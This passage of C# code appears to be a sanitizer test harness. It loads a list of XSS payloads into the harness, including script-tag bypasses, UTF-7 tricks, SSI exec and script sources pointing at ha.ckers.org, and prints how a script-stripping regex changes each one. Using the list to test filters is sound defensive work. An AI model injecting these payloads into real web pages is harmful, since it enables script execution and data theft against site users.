                payloads.Add(new XSSPayload() { Payload = "<BASE HREF='javascript:alert('XSS');//'>"});
                payloads.Add(new XSSPayload() { Payload = "<OBJECT TYPE='text/x-scriptlet' DATA='http://ha.ckers.org/scriptlet.html'></OBJECT>"});
                payloads.Add(new XSSPayload() { Payload = "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>"});
                payloads.Add(new XSSPayload() { Payload = "getURL('javascript:alert('XSS')')"});
                payloads.Add(new XSSPayload() { Payload = "a='get';"});
                payloads.Add(new XSSPayload() { Payload = "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC='javas<![CDATA[cript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<XML SRC='http://ha.ckers.org/xsstest.xml' ID=I></XML>"});
                payloads.Add(new XSSPayload() { Payload = "<HTML><BODY>"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT SRC='http://ha.ckers.org/xss.jpg'></SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "<!--#exec cmd='/bin/echo '<SCRIPT SRC''--><!--#exec cmd='/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>''-->"});
                payloads.Add(new XSSPayload() { Payload = "<? echo('<SCR)';"});
                payloads.Add(new XSSPayload() { Payload = "<META HTTP-EQUIV='Set-Cookie' Content='USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;'>"});
                payloads.Add(new XSSPayload() { Payload = "<HEAD><META HTTP-EQUIV='CONTENT-TYPE' CONTENT='text/html; charset=UTF-7'> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT a='>' SRC='http://ha.ckers.org/xss.js'></SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT a='>' '' SRC='http://ha.ckers.org/xss.js'></SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT 'a='>'' SRC='http://ha.ckers.org/xss.js'></SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT a=`>` SRC='http://ha.ckers.org/xss.js'></SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT>document.write('<SCRI');</SCRIPT>PT SRC='http://ha.ckers.org/xss.js'></SCRIPT>"});
            }
        }

        public static void ReplaceRegex(string input)
        {
            string sanitized = removeScriptTagAndIdNameAttributesRegEx.Replace(input, "");
            if(input != sanitized)
            {
                Console.ForegroundColor = ConsoleColor.Blue;
                Console.Write(input);
                Console.ForegroundColor = ConsoleColor.White;
                Console.Write(": ");
                Console.ForegroundColor = ConsoleColor.Red;
                Console.Write(sanitized);
                Console.WriteLine("");
            } else
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.Write(input + ":" + sanitized);
            }
        }
    }
}
